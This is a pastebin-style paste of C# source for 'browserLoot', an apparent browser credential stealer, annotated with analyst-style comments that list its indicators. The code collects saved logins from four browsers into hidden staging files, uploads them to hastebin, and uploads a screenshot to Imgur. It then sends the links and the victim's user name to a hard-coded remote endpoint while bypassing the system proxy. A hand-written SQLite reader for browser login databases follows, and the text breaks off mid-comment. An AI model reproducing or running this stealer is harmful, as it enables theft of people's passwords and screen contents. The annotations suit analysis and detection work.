
Untitled

a guest
Dec 5th, 2017
  1. using System;
  2. using System.Collections.Specialized;
  3. using System.Drawing;
  4. using System.Drawing.Imaging;
  5. using System.IO;
  6. using System.IO.Compression;
  7. using System.Net;
  8. using System.Runtime.InteropServices;
  9. using System.Text;
  10. using System.Text.RegularExpressions;
  11. using System.Windows.Forms;
  12. using Microsoft.VisualBasic;
  13. using Microsoft.VisualBasic.CompilerServices;
  14.  
  15. namespace browserLoot
  16. {
  /// <summary>
  /// Entry point of the "browserLoot" sample. Read as an analyst: this class orchestrates
  /// collection of saved browser logins (via <c>Recovery</c>), stages them in per-browser text
  /// files, uploads the files and a screenshot to public hosting services, and finally posts
  /// the resulting links together with the local user name to a remote endpoint.
  /// </summary>
  /// <remarks>
  /// Indicators visible in this class (all taken from the code below):
  ///  - Staging files named "&lt;guid&gt;_chrome.txt", "_opera.txt", "_vivaldi.txt", "_yandex.txt",
  ///    created with relative paths (so in the process working directory) and flagged Hidden.
  ///  - HTTPS POST to https://hastebin.com/documents with a fixed Chrome/57 user-agent string.
  ///  - HTTPS POST to https://api.imgur.com/3/upload.xml with "Authorization: Client-ID 23c111099c786a9".
  ///  - HTTPS POST to https://www.ezlib.rocks/customapi/Gz6l7Re31r/SendLinks (form-encoded body).
  ///  - Recursive delete and re-creation of "Screenshots" under the user's My Pictures folder.
  /// Every WebClient that carries collected data sets Proxy = null, so those requests do not
  /// go through a configured system proxy; egress controls that only inspect proxy traffic
  /// will not see them.
  /// </remarks>
  public static class Program
  {
      // Staging file names. A fresh GUID per process run means the names cannot be matched
      // exactly; the "_<browser>.txt" suffixes are the stable part.
      public static string FnChrome = Guid.NewGuid() + "_chrome.txt";
      public static string FnOpera = Guid.NewGuid() + "_opera.txt";
      public static string FnVivaldi = Guid.NewGuid() + "_vivaldi.txt";
      public static string FnYandex = Guid.NewGuid() + "_yandex.txt";

      // Windows account name of the logged-on user; sent to the remote endpoint in SendLinks.
      private static readonly string VictimName = Environment.UserName;

      // Links returned by the upload services; filled in by UploadFiles / TakeScreenshot and
      // read by SendLinks. A value still null in SendLinks is reported as "Not installed.".
      private static string ChromeUploadUri { get; set; }
      private static string OperaUploadUri { get; set; }
      private static string VivaldiUploadUri { get; set; }
      private static string YandexUploadUri { get; set; }
      private static string ScreenshotUploadUri { get; set; }

      /// <summary>
      /// Runs the whole collect / stage / upload / report sequence once and returns.
      /// </summary>
      [STAThread]
      private static void Main()
      {
          // Builder placeholders: the published source ships with these unset.
          var webhookId = "//WEBHOOK ID//";
          var webhookToken = "//WEBHOOK TOKEN//";

          // With the placeholders left in place the program exits immediately and does nothing.
          if (webhookId.Contains("//") || webhookToken.Contains("//"))
              Environment.Exit(0);

          // Clear any staging files with this run's names before collecting.
          DeleteFiles();

          var recoveryClass = new Recovery();
          recoveryClass.Chrome();
          recoveryClass.Opera();
          recoveryClass.Vivaldi();
          recoveryClass.Yandex();

          // Staging files are hidden, uploaded, then deleted from disk.
          HideFiles();
          UploadFiles();
          DeleteFiles();

          TakeScreenshot();
          SendLinks(webhookId, webhookToken);
      }

      #region " File Handling "

      /// <summary>
      /// Deletes each of the four staging files if it exists. Called both before collection
      /// and after upload, so the files only exist on disk for the duration of the run.
      /// </summary>
      private static void DeleteFiles()
      {
          if (File.Exists(FnChrome))
              File.Delete(FnChrome);

          if (File.Exists(FnOpera))
              File.Delete(FnOpera);

          if (File.Exists(FnVivaldi))
              File.Delete(FnVivaldi);

          if (File.Exists(FnYandex))
              File.Delete(FnYandex);
      }

      /// <summary>
      /// Adds the Hidden attribute to each staging file that exists. The first
      /// File.GetAttributes call in each branch discards its result.
      /// </summary>
      private static void HideFiles()
      {
          if (File.Exists(FnChrome))
          {
              File.GetAttributes(FnChrome);
              File.SetAttributes(FnChrome, File.GetAttributes(FnChrome) | FileAttributes.Hidden);
          }

          if (File.Exists(FnOpera))
          {
              File.GetAttributes(FnOpera);
              File.SetAttributes(FnOpera, File.GetAttributes(FnOpera) | FileAttributes.Hidden);
          }

          if (File.Exists(FnVivaldi))
          {
              File.GetAttributes(FnVivaldi);
              File.SetAttributes(FnVivaldi, File.GetAttributes(FnVivaldi) | FileAttributes.Hidden);
          }

          if (File.Exists(FnYandex))
          {
              File.GetAttributes(FnYandex);
              File.SetAttributes(FnYandex, File.GetAttributes(FnYandex) | FileAttributes.Hidden);
          }
      }

      #endregion

      #region " Screenshot Handling "

      /// <summary>
      /// Adds the Imgur "Authorization: Client-ID ..." header to the given client.
      /// </summary>
      /// <param name="w">Client that will perform the upload.</param>
      /// <param name="idImgur">Imgur API client id placed in the header.</param>
      /// <returns>Always true.</returns>
      private static bool UploadValues(WebClient w, string idImgur)
      {
          w.Headers.Add("Authorization", "Client-ID " + idImgur);
          return true;
      }

      /// <summary>
      /// Captures the primary screen to a PNG under "My Pictures\Screenshots", uploads it to
      /// Imgur as base64 form data, stores the returned link in ScreenshotUploadUri and then
      /// deletes the Screenshots directory again.
      /// </summary>
      /// <remarks>
      /// The two branches are identical except that an existing Screenshots directory is first
      /// deleted recursively, which also removes any screenshots the user had stored there.
      /// This WebClient does not set Proxy, unlike the ones in UploadFiles and SendLinks.
      /// </remarks>
      private static void TakeScreenshot()
      {
          if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots"))
          {
              // Existing folder: wipe it (recursive) and start from an empty one.
              Directory.Delete(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots",
                  true);

              Directory.CreateDirectory(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) +
                                        @"\Screenshots");

              // File name is the local date/time in brackets with ':' and '/' replaced by spaces.
              var screenshot = Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots\" +
                               "[" + DateTime.Now.ToString().Replace(':', ' ').Replace('/', ' ') + "].png";
              var bmpScreenshot = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height,
                  PixelFormat.Format32bppArgb);
              var gfxScreenshot = Graphics.FromImage(bmpScreenshot);
              gfxScreenshot.CopyFromScreen(Screen.PrimaryScreen.Bounds.X, Screen.PrimaryScreen.Bounds.Y, 0, 0,
                  Screen.PrimaryScreen.Bounds.Size, CopyPixelOperation.SourceCopy);
              bmpScreenshot.Save(screenshot, ImageFormat.Png);

              var sLink = string.Empty;
              var values = new NameValueCollection
              {
                  {"image", Convert.ToBase64String(File.ReadAllBytes(screenshot))},
                  {"title", Path.GetFileNameWithoutExtension(screenshot)}
              };

              using (var w = new WebClient())
              {
                  // Hard-coded Imgur client id; the XML response body is read into sLink.
                  if (UploadValues(w, "23c111099c786a9"))
                      using (var sr =
                          new StreamReader(
                              new MemoryStream(w.UploadValues(new Uri("https://api.imgur.com/3/upload.xml"),
                                  values))))
                      {
                          sLink = sr.ReadToEnd();
                      }
              }
              if (!string.IsNullOrEmpty(sLink))
              {
                  // Pull the <link> element out of the response with a regex, then remove the
                  // local copy of the screenshot together with its directory.
                  ScreenshotUploadUri = new Regex(@"<link>(.*?)</link>", RegexOptions.Multiline).Match(sLink)
                      .Groups[1]
                      .Value.Trim();
                  Directory.Delete(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots",
                      true);
              }
          }
          else
          {
              // No Screenshots folder yet: create it, then the same capture/upload/cleanup steps.
              Directory.CreateDirectory(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) +
                                        @"\Screenshots");

              var screenshot = Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots\" +
                               "[" + DateTime.Now.ToString().Replace(':', ' ').Replace('/', ' ') + "].png";
              var bmpScreenshot = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height,
                  PixelFormat.Format32bppArgb);
              var gfxScreenshot = Graphics.FromImage(bmpScreenshot);
              gfxScreenshot.CopyFromScreen(Screen.PrimaryScreen.Bounds.X, Screen.PrimaryScreen.Bounds.Y, 0, 0,
                  Screen.PrimaryScreen.Bounds.Size, CopyPixelOperation.SourceCopy);
              bmpScreenshot.Save(screenshot, ImageFormat.Png);

              var sLink = string.Empty;
              var values = new NameValueCollection
              {
                  {"image", Convert.ToBase64String(File.ReadAllBytes(screenshot))},
                  {"title", Path.GetFileNameWithoutExtension(screenshot)}
              };

              using (var w = new WebClient())
              {
                  if (UploadValues(w, "23c111099c786a9"))
                      using (var sr =
                          new StreamReader(
                              new MemoryStream(w.UploadValues(new Uri("https://api.imgur.com/3/upload.xml"),
                                  values))))
                      {
                          sLink = sr.ReadToEnd();
                      }
              }
              if (!string.IsNullOrEmpty(sLink))
              {
                  ScreenshotUploadUri = new Regex(@"<link>(.*?)</link>", RegexOptions.Multiline).Match(sLink)
                      .Groups[1]
                      .Value.Trim();
                  Directory.Delete(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots",
                      true);
              }
          }
      }

      #endregion

      #region " Server Handling "

      /// <summary>
      /// Uploads the contents of each existing staging file to hastebin.com as plain text and
      /// stores the resulting document URL in the matching *UploadUri property. The four
      /// sections (Chrome, Vivaldi, Opera, Yandex) are copies of one another.
      /// </summary>
      /// <remarks>
      /// If a staging file contains the string "V3rmillion" the process exits before anything
      /// is uploaded. NOTE(review): this looks like a deliberate exclusion for a specific site;
      /// the reason is not stated in the source.
      /// </remarks>
      private static void UploadFiles()
      {
          if (File.Exists(FnChrome))
              using (var sr = new StreamReader(FnChrome))
              {
                  var line = sr.ReadToEnd();

                  if (line.Contains("V3rmillion"))
                      Environment.Exit(0);

                  using (var webClient = new WebClient())
                  {
                      // Proxy = null: the request is sent directly, not via a configured proxy.
                      webClient.Proxy = null;
                      webClient.Headers.Add("content-type", "text/plain");
                      // Fixed user-agent so the POST resembles browser traffic; usable as an indicator.
                      webClient.Headers.Add("user-agent",
                          "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36");
                      var webResponse = webClient.UploadString("https://hastebin.com/documents", "POST", line);
                      // The response is a small JSON object; the key is extracted by stripping
                      // the surrounding JSON text rather than by parsing it.
                      ChromeUploadUri = "https://hastebin.com/" + webResponse.Replace("\"key\":\"", "")
                                            .Replace("\"}", "").Replace(" ", "").Replace("{", "");
                  }
              }

          if (File.Exists(FnVivaldi))
              using (var sr = new StreamReader(FnVivaldi))
              {
                  var line = sr.ReadToEnd();

                  if (line.Contains("V3rmillion"))
                      Environment.Exit(0);

                  using (var webClient = new WebClient())
                  {
                      webClient.Proxy = null;
                      webClient.Headers.Add("content-type", "text/plain");
                      webClient.Headers.Add("user-agent",
                          "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36");
                      var webResponse = webClient.UploadString("https://hastebin.com/documents", "POST", line);
                      VivaldiUploadUri = "https://hastebin.com/" + webResponse.Replace("\"key\":\"", "")
                                             .Replace("\"}", "").Replace(" ", "").Replace("{", "");
                  }
              }

          if (File.Exists(FnOpera))
              using (var sr = new StreamReader(FnOpera))
              {
                  var line = sr.ReadToEnd();

                  if (line.Contains("V3rmillion"))
                      Environment.Exit(0);

                  using (var webClient = new WebClient())
                  {
                      webClient.Proxy = null;
                      webClient.Headers.Add("content-type", "text/plain");
                      webClient.Headers.Add("user-agent",
                          "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36");
                      var webResponse = webClient.UploadString("https://hastebin.com/documents", "POST", line);
                      OperaUploadUri = "https://hastebin.com/" + webResponse.Replace("\"key\":\"", "")
                                           .Replace("\"}", "").Replace(" ", "").Replace("{", "");
                  }
              }

          if (File.Exists(FnYandex))
              using (var sr = new StreamReader(FnYandex))
              {
                  var line = sr.ReadToEnd();

                  if (line.Contains("V3rmillion"))
                      Environment.Exit(0);

                  using (var webClient = new WebClient())
                  {
                      webClient.Proxy = null;
                      webClient.Headers.Add("content-type", "text/plain");
                      webClient.Headers.Add("user-agent",
                          "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36");
                      var webResponse = webClient.UploadString("https://hastebin.com/documents", "POST", line);
                      YandexUploadUri = "https://hastebin.com/" + webResponse.Replace("\"key\":\"", "")
                                            .Replace("\"}", "").Replace(" ", "").Replace("{", "");
                  }
              }
      }

      /// <summary>
      /// Posts the collected links, the local user name and the two webhook values to the
      /// remote "SendLinks" endpoint as a form-encoded body.
      /// </summary>
      /// <param name="webhookId">Webhook id configured in Main.</param>
      /// <param name="webhookToken">Webhook token configured in Main.</param>
      /// <remarks>
      /// The body is built by plain string concatenation; the values are not URL-encoded.
      /// NOTE(review): the webhook id/token pair suggests the endpoint relays the message to a
      /// chat webhook on the operator's behalf; the source does not show the server side.
      /// </remarks>
      public static void SendLinks(string webhookId, string webhookToken)
      {
          using (var webClient = new WebClient())
          {
              // A browser whose upload link was never set is reported as "Not installed.".
              if (ChromeUploadUri == null)
                  ChromeUploadUri = "Not installed.";
              if (VivaldiUploadUri == null)
                  VivaldiUploadUri = "Not installed.";
              if (OperaUploadUri == null)
                  OperaUploadUri = "Not installed.";
              if (YandexUploadUri == null)
                  YandexUploadUri = "Not installed.";


              var postQuery =
                  "ChromeUploadUri=" + ChromeUploadUri +"&VivaldiUploadUri=" + VivaldiUploadUri + "&OperaUploadUri=" + OperaUploadUri + "&YandexUploadUri=" + YandexUploadUri + "&VictimName=" + VictimName + "&webhookId=" + webhookId + "&webhookToken=" + webhookToken + "&ScreenshotUploadUri=" + ScreenshotUploadUri;

              // Sent directly (no proxy) to the hard-coded reporting endpoint.
              webClient.Proxy = null;
              webClient.Headers.Add("content-type", "application/x-www-form-urlencoded");
              webClient.UploadString("https://www.ezlib.rocks/customapi/Gz6l7Re31r/SendLinks", "POST", postQuery);
          }
      }

      #endregion
  }
  312.  
  313. // USG HERE 1
  314.  
  315. #region " Database "
  316.  
  /// <summary>
  /// Hand-written, read-only reader for SQLite 3 database files. It loads the whole file into
  /// memory, validates the header, walks the master table b-tree and can then load every row
  /// of one named table as strings. No SQLite library is involved.
  /// </summary>
  /// <remarks>
  /// Analyst notes:
  ///  - The file is opened through Microsoft.VisualBasic.FileSystem with OpenAccess.Read and
  ///    OpenShare.Shared. NOTE(review): presumably so the database can be read while another
  ///    process (the browser) has it open; confirm against observed behaviour.
  ///  - Page offsets and lengths read from the file are used to index db_bytes without bounds
  ///    checks, so a truncated or malformed file ends in an exception rather than an error code.
  ///  - A process other than the browser reading a "Login Data" file through code like this is
  ///    the host-side behaviour worth alerting on.
  /// </remarks>
  public class SqliteHandler
  {
      // Entire database file, as bytes (round-tripped through Encoding.Default in the ctor).
      private readonly byte[] db_bytes;
      // Text encoding code from header offset 0x38; 0 is normalised to 1 in the ctor.
      private readonly ulong encoding;
      // Page size from header offset 0x10 (2 bytes, big-endian).
      private readonly ushort page_size;
      // Byte length for record serial types 0..9, indexed by the type value.
      private readonly byte[] SQLDataTypeSize = {0, 1, 2, 3, 4, 6, 8, 8, 0, 0};
      // Column names of the table most recently passed to ReadTable.
      private string[] field_names;
      // Entries read from the master table by ReadMasterTable.
      private sqlite_master_entry[] master_table_entries;
      // Rows loaded by ReadTable / ReadTableFromOffset.
      private table_entry[] table_entries;

      /// <summary>
      /// Loads <paramref name="baseName"/> into memory and reads its master table.
      /// If the file does not exist the constructor does nothing and all fields stay unset.
      /// </summary>
      /// <param name="baseName">Path of the SQLite database file.</param>
      /// <exception cref="Exception">
      /// The file does not start with "SQLite format 3", or header byte 0x34 is non-zero
      /// (reported as an auto-vacuum capable database).
      /// </exception>
      public SqliteHandler(string baseName)
      {
          if (File.Exists(baseName))
          {
              // VB-style file I/O: read the whole file into a string, then convert to bytes.
              FileSystem.FileOpen(1, baseName, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared, -1);
              var str = Strings.Space((int) FileSystem.LOF(1));
              FileSystem.FileGet(1, ref str, -1L, false);
              FileSystem.FileClose(1);
              db_bytes = Encoding.Default.GetBytes(str);
              if (Encoding.Default.GetString(db_bytes, 0, 15).CompareTo("SQLite format 3") != 0)
                  throw new Exception("Not a valid SQLite 3 Database File");
              if (db_bytes[0x34] != 0)
                  throw new Exception("Auto-vacuum capable database is not supported");
              page_size = (ushort) ConvertToInteger(0x10, 2);
              encoding = ConvertToInteger(0x38, 4);
              if (decimal.Compare(new decimal(encoding), decimal.Zero) == 0)
                  encoding = 1L;
              // Offset 100 is where the first page's b-tree header starts, after the file header.
              ReadMasterTable(100L);
          }
      }

      /// <summary>
      /// Reads <paramref name="Size"/> bytes from db_bytes starting at
      /// <paramref name="startIndex"/> as a big-endian unsigned integer.
      /// </summary>
      /// <returns>The value, or 0 when Size is 0 or greater than 8.</returns>
      private ulong ConvertToInteger(int startIndex, int Size)
      {
          if ((Size > 8) | (Size == 0))
              return 0L;
          ulong num2 = 0L;
          var num4 = Size - 1;
          for (var i = 0; i <= num4; i++)
              num2 = (num2 << 8) | db_bytes[startIndex + i];
          return num2;
      }

      /// <summary>
      /// Decodes the variable-length integer stored in db_bytes[startIndex..endIndex]
      /// (both inclusive; GVL supplies endIndex). Each byte contributes its low 7 bits, except
      /// that in a 9-byte value the last byte is taken whole.
      /// </summary>
      /// <returns>The decoded value, or 0 when the span is empty or longer than 9 bytes.</returns>
      private long CVL(int startIndex, int endIndex)
      {
          endIndex++;
          var buffer = new byte[8];
          var num4 = endIndex - startIndex;
          var flag = false;
          if ((num4 == 0) | (num4 > 9))
              return 0L;
          if (num4 == 1)
          {
              buffer[0] = (byte) (db_bytes[startIndex] & 0x7f);
              return BitConverter.ToInt64(buffer, 0);
          }
          // flag marks the 9-byte form, whose final byte carries 8 data bits.
          if (num4 == 9)
              flag = true;
          var num2 = 1;
          var num3 = 7;
          var index = 0;
          if (flag)
          {
              buffer[0] = db_bytes[endIndex - 1];
              endIndex--;
              index = 1;
          }
          // Walk from the last byte back to the first, packing 7-bit groups into the
          // little-endian buffer that BitConverter reads below.
          var num7 = startIndex;
          for (var i = endIndex - 1; i >= num7; i += -1)
              if (i - 1 >= startIndex)
              {
                  buffer[index] = (byte) (((byte) (db_bytes[i] >> ((num2 - 1) & 7)) & (0xff >> num2)) |
                                          (byte) (db_bytes[i - 1] << (num3 & 7)));
                  num2++;
                  index++;
                  num3--;
              }
              else if (!flag)
              {
                  buffer[index] = (byte) ((byte) (db_bytes[i] >> ((num2 - 1) & 7)) & (0xff >> num2));
              }
          return BitConverter.ToInt64(buffer, 0);
      }

      /// <summary>Returns the number of rows currently held in table_entries.</summary>
      public int GetRowCount()
      {
          return table_entries.Length;
      }

      /// <summary>
      /// Returns the names of all master-table entries whose type is "table".
      /// </summary>
      /// <returns>The names in master-table order, or null when there are none.</returns>
      public string[] GetTableNames()
      {
          string[] strArray2 = null;
          var index = 0;
          var num3 = master_table_entries.Length - 1;
          for (var i = 0; i <= num3; i++)
              if (master_table_entries[i].item_type == "table")
              {
                  // Grow the result array by one element for each match.
                  strArray2 = (string[]) Utils.CopyArray(strArray2, new string[index + 1]);
                  strArray2[index] = master_table_entries[i].item_name;
                  index++;
              }
          return strArray2;
      }

      /// <summary>
      /// Returns the value of column <paramref name="field"/> in row <paramref name="row_num"/>.
      /// </summary>
      /// <returns>The stored string, or null when either index is past the end.</returns>
      public string GetValue(int row_num, int field)
      {
          if (row_num >= table_entries.Length)
              return null;
          if (field >= table_entries[row_num].content.Length)
              return null;
          return table_entries[row_num].content[field];
      }

      /// <summary>
      /// Returns the value of the column named <paramref name="field"/> (compared after
      /// ToLower on both sides) in row <paramref name="row_num"/>.
      /// </summary>
      /// <returns>The stored string, or null when no column has that name.</returns>
      public string GetValue(int row_num, string field)
      {
          var num = -1;
          var length = field_names.Length - 1;
          for (var i = 0; i <= length; i++)
              if (field_names[i].ToLower().CompareTo(field.ToLower()) == 0)
              {
                  num = i;
                  break;
              }
          if (num == -1)
              return null;
          return GetValue(row_num, num);
      }

      /// <summary>
      /// Finds the last byte of the variable-length integer that starts at
      /// <paramref name="startIndex"/>: the first byte, within 9 bytes, whose high bit is clear.
      /// </summary>
      /// <returns>
      /// The index of that byte; startIndex + 8 when all nine bytes have the high bit set;
      /// 0 when the scan would run past the end of db_bytes.
      /// </returns>
      private int GVL(int startIndex)
      {
          if (startIndex > db_bytes.Length)
              return 0;
          var num3 = startIndex + 8;
          for (var i = startIndex; i <= num3; i++)
          {
              if (i > db_bytes.Length - 1)
                  return 0;
              if ((db_bytes[i] & 0x80) != 0x80)
                  return i;
          }
          return startIndex + 8;
      }

      /// <summary>Returns true when the lowest bit of <paramref name="value"/> is set.</summary>
      private bool IsOdd(long value)
      {
          return (value & 1L) == 1L;
      }

      /// <summary>
      /// Reads the master table page at byte offset <paramref name="Offset"/> and appends its
      /// entries to master_table_entries. A page whose first byte is 13 is read as a leaf;
      /// a page whose first byte is 5 is treated as an interior page and each child page it
      /// references is read recursively. Any other page type is ignored.
      /// </summary>
      /// <param name="Offset">Byte offset of the page header; 100 for the first page.</param>
      private void ReadMasterTable(ulong Offset)
      {
          if (db_bytes[(int) Offset] == 13)
          {
              // num2 = (cell count at Offset + 3) - 1, i.e. the highest cell index.
              var num2 = Convert.ToUInt16(
                  decimal.Subtract(
                      new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)),
                      decimal.One));
              var length = 0;
              if (master_table_entries != null)
              {
                  // Entries from earlier pages are kept; the array is grown for this page.
                  length = master_table_entries.Length;
                  master_table_entries = (sqlite_master_entry[]) Utils.CopyArray(master_table_entries,
                      new sqlite_master_entry[master_table_entries.Length + num2 + 1]);
              }
              else
              {
                  master_table_entries = new sqlite_master_entry[num2 + 1];
              }
              int num13 = num2;
              for (var i = 0; i <= num13; i++)
              {
                  // Cell pointer i lives at Offset + 8 + 2*i. On every page except the first
                  // (Offset == 100) it is relative to the page, so Offset is added.
                  var num = ConvertToInteger(
                      Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 8M), new decimal(i * 2))), 2);
                  if (decimal.Compare(new decimal(Offset), 100M) != 0)
                      num += Offset;
                  // First varint of the cell (value unused), then the row id varint.
                  var endIndex = GVL((int) num);
                  var num7 = CVL((int) num, endIndex);
                  var num6 = GVL(Convert.ToInt32(
                      decimal.Add(
                          decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))),
                          decimal.One)));
                  master_table_entries[length + i].row_id =
                      CVL(
                          Convert.ToInt32(decimal.Add(
                              decimal.Add(new decimal(num),
                                  decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One)), num6);
                  // num now points at the record header; num5 is the header-length varint.
                  num = Convert.ToUInt64(decimal.Add(
                      decimal.Add(new decimal(num), decimal.Subtract(new decimal(num6), new decimal(num))),
                      decimal.One));
                  endIndex = GVL((int) num);
                  num6 = endIndex;
                  var num5 = CVL((int) num, endIndex);
                  // Sizes of the five master-table columns, derived from their serial types.
                  var numArray = new long[5];
                  var index = 0;
                  do
                  {
                      endIndex = num6 + 1;
                      num6 = GVL(endIndex);
                      numArray[index] = CVL(endIndex, num6);
                      // Types above 9 encode a length: (type - 13) / 2 when odd,
                      // (type - 12) / 2 when even. Types 0..9 use the fixed-size table.
                      if (numArray[index] > 9L)
                          if (IsOdd(numArray[index]))
                              numArray[index] = (long) Math.Round((numArray[index] - 13L) / 2.0);
                          else
                              numArray[index] = (long) Math.Round((numArray[index] - 12L) / 2.0);
                      else
                          numArray[index] = SQLDataTypeSize[(int) numArray[index]];
                      index++;
                  } while (index <= 4);
                  // Column 0: item type. Decoder chosen by the header encoding code
                  // (1 -> Encoding.Default, 2 -> Unicode, 3 -> BigEndianUnicode).
                  if (decimal.Compare(new decimal(encoding), decimal.One) == 0)
                      master_table_entries[length + i].item_type = Encoding.Default.GetString(db_bytes,
                          Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int) numArray[0]);
                  else if (decimal.Compare(new decimal(encoding), 2M) == 0)
                      master_table_entries[length + i].item_type = Encoding.Unicode.GetString(db_bytes,
                          Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int) numArray[0]);
                  else if (decimal.Compare(new decimal(encoding), 3M) == 0)
                      master_table_entries[length + i].item_type = Encoding.BigEndianUnicode.GetString(db_bytes,
                          Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int) numArray[0]);
                  // Column 1: item name, located after column 0.
                  if (decimal.Compare(new decimal(encoding), decimal.One) == 0)
                      master_table_entries[length + i].item_name = Encoding.Default.GetString(db_bytes,
                          Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
                              new decimal(numArray[0]))), (int) numArray[1]);
                  else if (decimal.Compare(new decimal(encoding), 2M) == 0)
                      master_table_entries[length + i].item_name = Encoding.Unicode.GetString(db_bytes,
                          Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
                              new decimal(numArray[0]))), (int) numArray[1]);
                  else if (decimal.Compare(new decimal(encoding), 3M) == 0)
                      master_table_entries[length + i].item_name = Encoding.BigEndianUnicode.GetString(db_bytes,
                          Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
                              new decimal(numArray[0]))), (int) numArray[1]);
                  // Column 3: root page number (column 2 is skipped over, not stored).
                  master_table_entries[length + i].root_num =
                      (long) ConvertToInteger(
                          Convert.ToInt32(decimal.Add(
                              decimal.Add(
                                  decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
                                      new decimal(numArray[0])), new decimal(numArray[1])),
                              new decimal(numArray[2]))), (int) numArray[3]);
                  // Column 4: the CREATE statement text, used later by ReadTable for column names.
                  if (decimal.Compare(new decimal(encoding), decimal.One) == 0)
                      master_table_entries[length + i].sql_statement = Encoding.Default.GetString(db_bytes,
                          Convert.ToInt32(decimal.Add(
                              decimal.Add(
                                  decimal.Add(
                                      decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
                                          new decimal(numArray[0])), new decimal(numArray[1])),
                                  new decimal(numArray[2])), new decimal(numArray[3]))), (int) numArray[4]);
                  else if (decimal.Compare(new decimal(encoding), 2M) == 0)
                      master_table_entries[length + i].sql_statement = Encoding.Unicode.GetString(db_bytes,
                          Convert.ToInt32(decimal.Add(
                              decimal.Add(
                                  decimal.Add(
                                      decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
                                          new decimal(numArray[0])), new decimal(numArray[1])),
                                  new decimal(numArray[2])), new decimal(numArray[3]))), (int) numArray[4]);
                  else if (decimal.Compare(new decimal(encoding), 3M) == 0)
                      master_table_entries[length + i].sql_statement = Encoding.BigEndianUnicode.GetString(db_bytes,
                          Convert.ToInt32(decimal.Add(
                              decimal.Add(
                                  decimal.Add(
                                      decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
                                          new decimal(numArray[0])), new decimal(numArray[1])),
                                  new decimal(numArray[2])), new decimal(numArray[3]))), (int) numArray[4]);
              }
          }
          else if (db_bytes[(int) Offset] == 5)
          {
              // Interior page: cell pointers start at Offset + 12; each cell begins with a
              // 4-byte child page number, converted to a byte offset as (page - 1) * page_size.
              var num11 = Convert.ToUInt16(
                  decimal.Subtract(
                      new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)),
                      decimal.One));
              int num14 = num11;
              for (var j = 0; j <= num14; j++)
              {
                  var startIndex =
                      (ushort) ConvertToInteger(
                          Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 12M), new decimal(j * 2))), 2);
                  if (decimal.Compare(new decimal(Offset), 100M) == 0)
                      ReadMasterTable(Convert.ToUInt64(
                          decimal.Multiply(
                              decimal.Subtract(new decimal(ConvertToInteger(startIndex, 4)), decimal.One),
                              new decimal(page_size))));
                  else
                      ReadMasterTable(Convert.ToUInt64(
                          decimal.Multiply(
                              decimal.Subtract(new decimal(ConvertToInteger((int) (Offset + startIndex), 4)),
                                  decimal.One), new decimal(page_size))));
              }
              // Finally follow the 4-byte page number stored at Offset + 8.
              ReadMasterTable(Convert.ToUInt64(
                  decimal.Multiply(
                      decimal.Subtract(
                          new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 8M)), 4)),
                          decimal.One), new decimal(page_size))));
          }
      }

      /// <summary>
      /// Loads every row of the table named <paramref name="TableName"/> (compared after
      /// ToLower on both sides) into table_entries and records its column names.
      /// </summary>
      /// <remarks>
      /// Column names are taken from the stored CREATE statement: the text after the first "("
      /// is split on ',' and the first word of each piece is kept, stopping at a piece that
      /// starts with "UNIQUE".
      /// </remarks>
      /// <returns>False when no master-table entry has that name; otherwise true.</returns>
      public bool ReadTable(string TableName)
      {
          var index = -1;
          var length = master_table_entries.Length - 1;
          for (var i = 0; i <= length; i++)
              if (master_table_entries[i].item_name.ToLower().CompareTo(TableName.ToLower()) == 0)
              {
                  index = i;
                  break;
              }
          if (index == -1)
              return false;
          var strArray = master_table_entries[index].sql_statement
              .Substring(master_table_entries[index].sql_statement.IndexOf("(") + 1).Split(',');
          var num6 = strArray.Length - 1;
          for (var j = 0; j <= num6; j++)
          {
              strArray[j] = strArray[j].TrimStart();
              var num4 = strArray[j].IndexOf(" ");
              if (num4 > 0)
                  strArray[j] = strArray[j].Substring(0, num4);
              if (strArray[j].IndexOf("UNIQUE") == 0)
                  break;
              field_names = (string[]) Utils.CopyArray(field_names, new string[j + 1]);
              field_names[j] = strArray[j];
          }
          // Root page number -> byte offset of that page.
          return ReadTableFromOffset((ulong) ((master_table_entries[index].root_num - 1L) * page_size));
      }

      /// <summary>
